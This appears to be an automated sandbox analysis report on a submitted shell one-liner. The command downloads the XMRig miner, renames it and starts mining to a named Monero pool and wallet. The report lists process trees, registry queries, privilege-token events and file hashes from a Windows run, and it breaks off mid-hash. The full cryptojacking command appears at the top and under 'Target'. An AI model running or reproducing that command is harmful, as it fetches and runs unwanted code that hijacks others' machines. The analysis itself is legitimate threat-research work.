hxxp://wget hxxps://github[.]com/xmrig/xmrig/releases/download/v6[.]21[.]3/xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && tar -xz -f xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && cd xmrig-6[.]21[.]3 && mv xmrig cool && [.]/cool -o xmrpool[.]eu[:]3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13-07-2024 19:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133653739101461223"	chrome.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3572	msedge.exe
3572	msedge.exe
3944	msedge.exe
3944	msedge.exe
228	identity_helper.exe
228	identity_helper.exe
1344	chrome.exe
1344	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe
Token: SeShutdownPrivilege	1344	chrome.exe
Token: SeCreatePagefilePrivilege	1344	chrome.exe

Suspicious use of FindShellTrayWindow 52 IoCs

pid	Process
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
3944	msedge.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe
1344	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3944 wrote to memory of 4820	3944	msedge.exe	86
PID 3944 wrote to memory of 4820	3944	msedge.exe	86
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 1412	3944	msedge.exe	87
PID 3944 wrote to memory of 3572	3944	msedge.exe	88
PID 3944 wrote to memory of 3572	3944	msedge.exe	88
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89
PID 3944 wrote to memory of 1136	3944	msedge.exe	89

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa30ad46f8,0x7ffa30ad4708,0x7ffa30ad4718
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
  2⤵
  PID:1412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
  2⤵
  PID:1136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4088 /prefetch:8
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,13769604766435076372,10303757965542212767,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4088 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2672

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa21e3cc40,0x7ffa21e3cc4c,0x7ffa21e3cc58
  2⤵
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2028 /prefetch:2
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2348 /prefetch:3
  2⤵
  PID:4572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2044,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2468 /prefetch:8
  2⤵
  PID:1600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3644 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4724 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4780,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5052 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3216,i,1773405894411607721,4471668340419297662,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3404 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1912

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
46ff56d48606e84c3bb3c4ab35755cdc

SHA1
8fdc31e7d57bd4cbe2b878cbefad851af7967263

SHA256
12e7d6e9275564c8a10f898ad377437024b7f1a716e25458eb79c5c9cd6c6ac5

SHA512
13d7ff4ab2bd2f57699fba5ce0efc0014fe20bbda0a6646659ffc75c3d8513225b955f635168cbbf09a03b16d8ca104caf32cc54275f390e3002236bba0e6960

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
905fde72c311a40633915819ddac1e0d

SHA1
8260d0948d049cf52d71efcf7341f83f39548759

SHA256
9cdb7a6053fafcb9669651b8b5c1a1e775fb6eb596b5da551b0b81e55c021665

SHA512
bbad07a94c04122fab1ce6d28b0fc628475c8d9383bc7a9d3e8688434056941ced6dea97889ae5135cc1000b785cc09f350de2ae0018ad2263a21ed267f806fb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
63f0f3cc3667c0563c518eef0a07028b

SHA1
472195e7e77d86b9eec4ad2f9407c7bf08d5ce39

SHA256
275d2b73a28d3af1cf0d973774fed0de43e3e6003a5397d82dc7e0627711ee31

SHA512
22e07117801ead9b2681d9fd05fdaf930c095c04564a6b04875c1b9787d1a282d0a133f765922ca3bd7bcd88f12133524ec224dfeaebf687fe3957ae61b73126

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
5988ad5f9969a6b0c174c98afdd8e923

SHA1
aa1482a6154dbdeb13ccf6b437097cac93dbe417

SHA256
45ea5babc1f4c381c1f6d962e6cca455d37ac622af3ca2666fe8d5adf98fc8a5

SHA512
b3793e42c9af09e11578097c9ca479f6942d1311404de7e0b1b1e77e4dd9e25fa7e274fc057660044949b1bd02d65a8c4cb4e55c639dfe50200947af7c3bfb4c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
219a54d15f010b0f85c75b490248b71b

SHA1
b7eab2850b73121352b59f4876239913fedc7bc6

SHA256
cec2d4019d3d22f0d65a7724443ce99d458d7b06ba04489d698dd612d95a736b

SHA512
bdf5283f76b062de633fe1681a82e7d7b28156541f3e3dff67aec6584a7543b9f2c2c7ad91fa80affa0b2cd974c6c69cd818dee4b5efbeb0f80f7902e0025542

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
58ddb1a1f088f420c0dff6dd8cb219dd

SHA1
505fb48d9fbaadd3ae815edfd75a1008d993fa0b

SHA256
a331a575b624509bbae111f80e8e9eb9e3efce47179c00ad9eaa7e10022e331d

SHA512
35151d70f426a36c2f2f1952fa1533522514c9623b13da02d17caf62752d4349b021ad12cc082d1a20f21573dfa13b979077070e9229982f1f91897d2e2b24ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5528b0fe2a147fe48492ca5c508b2ab0

SHA1
23b644ffbd5b987da46d4a39ec34e8e5df7eb137

SHA256
d534a8f7b1210040ca8f44e818e50f23a3d56b6f3dd2bdd448449fe4433a2e70

SHA512
